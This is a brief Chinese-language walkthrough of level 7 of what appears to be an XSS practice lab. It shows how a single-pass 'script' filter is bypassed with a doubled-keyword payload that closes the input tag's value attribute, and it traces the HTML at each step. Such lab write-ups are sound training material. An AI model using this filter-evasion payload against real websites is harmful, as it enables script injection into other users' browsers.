第七关过滤了 script , 但未过滤尖括号 '<','>' , 使用双写绕过
源码中过滤了大小写 , script , 以及一些属性 , 并将参数拼接到 value 值
使用 htmlspecialchars() 过滤标签 , 但未重新赋值给 $str , 所以不会产生影响
此关卡为过滤尖括号 , 并且只过滤了一遍 script , 我们使用双写绕过 payload
"><scscriptript>alert(7)</scscriptript>
左侧双引号用来闭合 value属性的左双引号 , 左侧尖括号 > 用来闭合input标签
<input name=keyword value="'.$str6.'"> //拼接前 <input name=keyword value=""> <scscriptript>alert(7)</scscriptript>"> //拼接后 <input name=keyword value=""> <script>alert(7)</script>"> //过滤后
过关
